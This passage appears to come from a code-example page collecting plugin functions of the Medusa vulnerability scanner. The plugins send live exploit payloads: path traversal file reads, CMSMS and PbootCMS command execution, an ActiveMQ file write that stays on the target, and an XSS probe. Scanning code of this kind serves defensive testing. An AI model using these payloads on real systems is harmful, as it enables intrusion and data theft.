            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
예제 #14
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
    """Check one target for an exposed phpStudy probe page.

    GETs ``scheme://host:port`` followed by the module-level ``payload`` and
    records a finding when the body contains both ``php_version`` and
    ``phpstudy`` (case-insensitive). The status code is not considered.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Request headers supplied by the caller; sent as given.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join((scheme, "://", url, ':', str(port), payload))

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=Headers, timeout=5, proxies=proxies, verify=False)
        lowered_body = resp.text.lower()
        if 'php_version' in lowered_body and 'phpstudy' in lowered_body:
            report = "{} 存在phpstudy探针泄露漏洞\r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:" + plugin_name + " || Target Url:" + url, exc)
예제 #15
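def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the Metinfo arbitrary file read issue.

    Requests ``/include/thumb.php?dir=<payload>`` for each of three
    traversal spellings of ``config/config_db.php`` and records a finding
    for every response that is HTTP 200 and whose body contains ``<?php``,
    ``con_db_host``, ``con_db_por`` and ``con_db_id``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    # The backslash variant is a raw string: "\." and "\c" are invalid
    # escape sequences in a normal literal and trigger a warning on current
    # Python versions. The runtime value is unchanged.
    payloads = ['..././http/..././config/config_db.php', '.....///http/.....///config/config_db.php',
                    r'http\..\..\config\config_db.php', ]
    # The headers do not depend on the payload, so build them once.
    headers = {
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
        "Accept-Encoding": "gzip, deflate",
    }
    config_markers = ('con_db_host', '<?php', 'con_db_por', 'con_db_id')
    for payload in payloads:
        # Each payload has its own try block, so one failed request does not
        # stop the remaining spellings from being tried.
        try:
            payload_url = scheme + "://" + url +":"+ str(port) + '/include/thumb.php?dir=' + payload

            # verify=False: the server certificate is not validated for this probe.
            resp = requests.get(payload_url, headers=headers, proxies=proxies,timeout=6,  verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and all(marker in con for marker in config_markers):
                # NOTE(review): the report embeds the full response body,
                # i.e. the database configuration that was read; treat the
                # output file as sensitive.
                Medusa = "{}存在Metinfo任意文件读取漏洞\r\n 漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                # Pass in the url and the scanned data.
                ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
                # Write to file: url is the target file name, Medusa is the result.
                ClassCongregation.WriteFile().result(str(url),str(Medusa))
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ClassCongregation.ErrorHandling().Outlier(e, _)
            # Call the error-log writer with the URL and the failing plugin's name.
            ClassCongregation.ErrorLog().Write(url, _)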
예제 #16
def medusa(Url,RandomAgent,Token,proxies=None):
    """Check one target for the issue this plugin reports as Nginx CRLF injection.

    GETs ``scheme://host:port`` followed by the module-level ``Payload`` and
    records a finding when the response is HTTP 200 and its body contains
    both ``bin`` and ``root`` (case-insensitive).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed to ClassCongregation.VulnerabilityDetails with a finding.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    PayloadUrl = "".join((scheme, "://", url, ':', str(port), Payload))
    host = "".join((url, ':', str(port)))
    request_headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }

    try:
        # NOTE(review): `s` is not defined in this function; presumably a
        # module-level requests session -- confirm it exists. This request
        # also keeps certificate verification at that session's setting.
        resp = s.get(PayloadUrl, headers=request_headers, proxies=proxies, timeout=5)
        lowered_body = resp.text.lower()
        # NOTE(review): "bin" and "root" are short, common substrings, so
        # this test can match unrelated pages; confirm hits manually.
        if resp.status_code == 200 and 'bin' in lowered_body and 'root' in lowered_body:
            report = "{}存在Nginx_CRLF注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, Token).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check one target for the 用友 (Yonyou) OA getemaildata file read issue.

    GETs ``scheme://host:port`` followed by the module-level ``payload`` and
    records a finding when the response is HTTP 200 and its body contains
    ``patch`` (case-insensitive).

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload_url = "".join((scheme, "://", url, ':', str(port), payload))
        request_headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=request_headers, timeout=5, proxies=proxies, verify=False)
        body = resp.text
        # NOTE(review): a single common word is the only evidence, so any
        # 200 page mentioning "patch" matches; confirm hits manually.
        if resp.status_code == 200 and 'patch' in body.lower():
            report = "{}存在用友OA_getemaildata任意文件读取漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
예제 #18
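def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check one target for the CMSMS user-tag command execution issue.

    POSTs an ``editusertag.php`` form whose ``code`` field is
    ``passthru('dir');`` with ``run=1`` and records a finding when the
    response body contains ``{"response":"Success","details":"}``. The
    status code is not considered.

    Args:
        Url: Target URL; split by ClassCongregation.UrlProcessing.
        Headers: Base request headers supplied by the caller; not modified.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        payload = "/cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&userplugin_id=4"
        # NOTE(review): apply=1 presumably saves the tag on the target, so a
        # successful check may leave a modified user tag behind -- confirm
        # and restore it after testing.
        data = "_sk_=2a7da2216d41e0ac&userplugin_id=4&userplugin_name=aaa&code=passthru('dir')%3B&description=&run=1&apply=1&ajax=1"
        payload_url = scheme + "://" + url +":"+ str(port) + payload

        # Work on a copy: writing these values into the caller's dict would
        # carry Content-Length, Content-Type and X-Requested-With over to any
        # later request built from the same headers.
        req_headers = dict(Headers)
        req_headers["Accept"]="*/*"
        req_headers["Content-Type"]="application/x-www-form-urlencoded; charset=UTF-8"
        req_headers["X-Requested-With"]="XMLHttpRequest"
        # Derived from the body instead of hard-coded; the value is still 115.
        req_headers["Content-Length"]=str(len(data))
        req_headers["Connection"]="close"
        req_headers["Pragma"]="no-cache"
        req_headers["Cache-Control"]="no-cache"

        # verify=False: the server certificate is not validated for this probe.
        resp = requests.post(payload_url, data=data, headers=req_headers, proxies=proxies,timeout=6,  verify=False)
        con = resp.text
        if '''{"response":"Success","details":"}''' in con:
            Medusa = "{}存在CMSMS任意命令执行漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)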
예제 #19
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Check one target for the 五车 library system arbitrary file download issue.

    GETs ``/5clib/kinweblistaction.action`` with ``filePath`` set to
    ``c:/windows/win.ini`` and records a finding when the response is HTTP
    200 and its body contains both ``MPEGVideo`` and ``support``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.
        **kwargs: Forwarded unchanged to ClassCongregation.VulnerabilityDetails.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        path = "/5clib/kinweblistaction.action?actionName=down&filePath=c:/windows/win.ini"
        payload_url = "".join((scheme, "://", url, ":", str(port), path))
        request_headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.get(payload_url, headers=request_headers, timeout=6, proxies=proxies, verify=False)
        body = resp.text
        # The path is Windows-specific, so a host on another OS is never
        # reported by this check regardless of whether the endpoint is exposed.
        if resp.status_code == 200 and 'MPEGVideo' in body and 'support' in body:
            report = "{}存在五车图书管理系统存在任意文件下载漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(report)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(finding.info, url, **kwargs).Write()
            # Write to file: url is the target file name, report is the result.
            ClassCongregation.WriteFile().result(str(url), str(report))
    except Exception as exc:
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(exc, plugin_name)
        # Call the error-log writer with the URL and the failing plugin's name.
        ClassCongregation.ErrorLog().Write(url, plugin_name)
예제 #20
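def medusa(Url, RandomAgent, Token, proxies=None):
    """Check whether the target advertises the HTTP OPTIONS method.

    Sends an OPTIONS request to ``scheme://host:port`` and records a finding
    when the ``Allow`` response header contains ``OPTIONS``.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed to ClassCongregation.VulnerabilityDetails with a finding.
        proxies: Proxy setting, passed through ClassCongregation.Proxies.

    Returns:
        None. Findings and errors are written through ClassCongregation.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Only fill in a port when the URL did not carry one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80

    try:
        payload_url = scheme + "://" + url + ':' + str(port)
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        # verify=False: the server certificate is not validated for this probe.
        resp = requests.options(payload_url,
                                headers=headers,
                                proxies=proxies,
                                timeout=5,
                                verify=False)
        # A response without an Allow header means "no finding"; indexing the
        # header would raise KeyError and log every such target as a plugin
        # error.
        if "OPTIONS" in resp.headers.get('Allow', ''):
            Medusa = "{}存在options方法开启漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(
                url, payload_url)
            _t = VulnerabilityInfo(Medusa)
            # Pass in the url and the scanned data.
            ClassCongregation.VulnerabilityDetails(
                _t.info, url, Token).Write()
            # Write to file: url is the target file name, Medusa is the result.
            ClassCongregation.WriteFile().result(
                str(url), str(Medusa))
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # Call the error-log writer.
        ClassCongregation.ErrorLog().Write(url, _)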
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a CMS Made Simple admin endpoint for reflected script markup.

    Requests ``moduleinterface.php`` with a script tag carrying a fixed
    marker in the ``m1_version`` parameter and records a finding when the
    response is 200 and the marker text appears in the body.

    Args:
        Url: Target URL, split by ClassCongregation.UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to ClassCongregation.VulnerabilityDetails.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        # The path is pinned to a /cmsms2.2.7/ install directory, so installs
        # under any other path are not covered by this check.
        payload = "/cmsms2.2.7/admin/moduleinterface.php?mact=ModuleManager,m1_,moduledepends,0&__c=3da8342831010e889e2&m1_name=Adherents&m1_version=0.2.6<script>alert(cscanhyhm2n)</script>&m1_filename=Adherents-0.2.6.xml"
        base = scheme + "://" + url + ":" + str(port)
        payload_url = base + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        body = resp.text
        status = resp.status_code
        # NOTE(review): only the bare marker is matched, so a response that
        # echoes it HTML-escaped also counts; confirm findings manually.
        marker_reflected = 'cscanhyhm2n' in body
        if status == 200 and marker_reflected:
            Medusa = "{}存在CMSMS反射型跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(finding.info, url, Token).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Log the failure with the URL and the plugin name, then carry on.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        ClassCongregation.ErrorLog().Write(url, plugin_name)
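def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a Rails application for the CVE-2019-5418 file-read behaviour.

    Requests ``/robots`` with a path-traversal value in the ``Accept``
    header and records a finding when the response is 200 and the body
    contains the ``root:``, ``bin:``, ``sys:`` and ``sync:`` account
    prefixes.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "../../../../../../../../etc/passwd{{"
        payload_url = scheme + "://" + url + ":" + str(port) + "/robots"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': payload,
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }

        # The session is only used for this one request; the context manager
        # releases its connection pool instead of leaving it to the GC.
        with requests.session() as s:
            resp = s.get(payload_url, headers=headers, timeout=5, proxies=proxies, verify=False)
            con = resp.text
            code = resp.status_code
        markers = ('root:', 'bin:', 'sys:', 'sync:')
        if code == 200 and all(marker in con for marker in markers):
            # NOTE(review): the whole response body, i.e. the target's account
            # file, is copied into the stored finding; handle reports with care.
            Medusa = "{} 存在RubyOnRails任意文件读取(CVE-2019-5418)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)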
예제 #23
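def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a PbootCMS site for template-tag code execution.

    Requests the search endpoint with a ``pboot:if`` tag in ``keyword`` and
    records a finding when the response is 200 and the body contains the
    ``System``, ``Build Date``, ``Compiler`` and ``PHP Version`` labels.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to ClassCongregation.VulnerabilityDetails.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
    """
    # NOTE(review): the normalised proxies value is never handed to urlopen
    # below, so this plugin connects directly even when a proxy is configured.
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload = "/index.php/index/index?keyword={pboot:if(1)$a=$_GET[b];$a();//)})}}{/pboot:if}&b=phpinfo"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        header = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        req = request.Request(payload_url, headers=header)
        # urlopen has no default timeout, so an unresponsive host would stall
        # the scan; bound the wait and close the response when done.
        with request.urlopen(req, timeout=6) as response:
            # If decoding fails, drop gzip from the request headers.
            con = response.read().decode('utf8')
            code = response.getcode()
        markers = ('System', 'Build Date', 'Compiler', 'PHP Version')
        if code == 200 and all(marker in con for marker in markers):
            Medusa = "{} 存在PbootCMS命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(_t.info, url, Token).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Log the failure with the URL and the plugin name, then carry on.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write(url, _)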
예제 #24
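def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check an ActiveMQ fileserver for unauthenticated PUT (CVE-2016-3088).

    PUTs a random marker to ``/fileserver/Medusa.txt``, reads the same path
    back, and records a finding when the PUT returned 204 and the marker is
    present in the body of the GET.

    This check writes to the target: the function sends no request that
    removes ``Medusa.txt`` afterwards, so the file stays on a vulnerable host.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Request headers supplied by the caller; not modified.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        PayloadPoc = "/fileserver/Medusa.txt"
        PayloadUrl = scheme + '://' + url + ':' + str(port)+PayloadPoc
        PayloadCode = ClassCongregation.randoms().result(50)+'@Medusa'
        # Work on a copy: the original wrote "Connection: close" into the
        # caller's dict, which then leaked into whatever reused it.
        request_headers = dict(Headers)
        request_headers["Connection"]="close"

        # Close the session once both requests are done.
        with requests.session() as s:
            resp = s.put(PayloadUrl, data=PayloadCode, headers=request_headers, proxies=proxies,timeout=3,verify=False)
            code = resp.status_code
            # NOTE(review): unlike the PUT, this read-back uses default TLS
            # verification, so an https target with an untrusted certificate
            # fails here after the file was already written.
            resp2=s.get(PayloadUrl, headers=request_headers,proxies=proxies, timeout=3).text
        if code==204 and PayloadCode in resp2:
            Medusa = "{} 存在ActiveMQ任意文件写入漏洞(CVE-2016-3088)\r\n漏洞详情:\r\nPayload:{}\r\nPUT内容:{}\r\n".format(url, PayloadUrl,PayloadCode)
            _t = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)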
def medusa(Url, RandomAgent, Token, proxies=None):
    """Check a Citrix gateway for path traversal under ``/vpn/``.

    Requests two ``/vpn/../vpns/`` paths in turn and records a finding for
    each one that returns 200 with ``encrypt password`` in the body.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        Token: Passed through to ClassCongregation.VulnerabilityDetails.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # Both paths are always tried, so one host can yield two findings.
        for probe_path in ("/vpn/../vpns/services.html", "/vpn/../vpns/cfg/smb.conf"):
            payload_url = scheme + '://' + url + ':' + str(port) + probe_path

            session = requests.session()
            resp = session.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
            body = resp.text
            if resp.status_code != 200 or "encrypt password" not in body:
                continue
            Medusa = "{}存在Citrix网关路径遍历漏洞\r\n 验证数据:\r\nPOC:{}\r\n返回内容:{}\r\n".format(url, payload_url, body)
            finding = VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(finding.info, url, Token).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url), str(Medusa))
    except Exception as e:
        # Log the failure with the URL and the plugin name, then carry on.
        plugin_name = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, plugin_name)
        ClassCongregation.ErrorLog().Write(url, plugin_name)
예제 #26
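def medusa(Url:str,Headers:dict,proxies:str=None,**kwargs)->None:
    """Check a Kibana console endpoint for CVE-2018-17246 behaviour.

    Requests ``/api/console/api_server`` with a traversal value in ``apis``
    and records a finding when the response is a 500 carrying the generic
    internal-server-error JSON body and a ``kbn-name: kibana`` header.

    The file content is never returned, so the finding rests on the error
    response alone. NOTE(review): treat hits as candidates and confirm
    against the installed Kibana version.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        Headers: Request headers supplied by the caller; not modified.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    try:
        payload_url = scheme+'://'+url+':'+str(port)+'/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd'
        # Work on a copy: the original overwrote Accept and Content-Type in
        # the caller's dict, which then leaked into whatever reused it.
        request_headers = dict(Headers)
        request_headers['Accept']='*/*'
        request_headers['Content-Type']='application/x-www-form-urlencoded'

        resp = requests.get(payload_url, headers=request_headers,timeout=5, proxies=proxies,verify=False)
        con=resp.text
        code = resp.status_code
        error_body = '{"statusCode":500,"error":"Internal Server Error","message":"An internal server error occurred"}'
        # .get() so a matching 500 from a server without the kbn-name header
        # is a non-finding rather than a KeyError in the error log.
        if code== 500 and error_body in con and resp.headers.get('kbn-name')=="kibana":
            Medusa = "{} 存在Kibana任意文件读取漏洞(CVE-2018-17246)\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url,payload_url,con.encode(encoding='utf-8'))
            _t=VulnerabilityInfo(Medusa)
            # Hand the finding (target and scan output) to the result writer.
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write()
            # Write the result to a file; url is used as the file name.
            ClassCongregation.WriteFile().result(str(url),str(Medusa))
    except Exception as e:
        # Plugin-level boundary: any failure is logged, never propagated.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)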
예제 #27
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Check a Jenkins instance on Windows for arbitrary file read.

    POSTs to ``/plugin/credentials/.ini`` with a traversal value in the
    ``Accept-Language`` header and records a finding when the response is
    200 and the body contains the ``[fonts]``, ``[extensions]`` and
    ``[mci extensions]`` section names.

    Args:
        Url: Target URL; split into scheme, host and port by UrlProcessing.
        RandomAgent: Value sent as the User-Agent header.
        proxies: Proxy setting, normalised by ClassCongregation.Proxies.
        **kwargs: Passed through to ClassCongregation.VulnerabilityDetails.
    """
    proxies = ClassCongregation.Proxies().result(proxies)

    scheme, url, port = UrlProcessing(Url)
    # Default the port from the scheme when the URL did not name one.
    if port is None:
        if scheme == 'https':
            port = 443
        elif scheme == 'http':
            port = 80
    try:
        probe_path = "/plugin/credentials/.ini"
        payload_url = scheme + "://" + url + ':' + str(port) + probe_path

        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Language': '../../../../../../../../windows/win',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        resp = requests.post(payload_url, headers=headers, proxies=proxies, timeout=6, verify=False)
        body = resp.text
        status = resp.status_code
        # All three section names have to be present for a finding.
        sections_found = (
            '[fonts]' in body
            and '[extensions]' in body
            and '[mci extensions]' in body
        )
        if status == 200 and sections_found:
            Medusa = "{}Jenkins任意文件读取漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\n".format(url, payload_url, body)
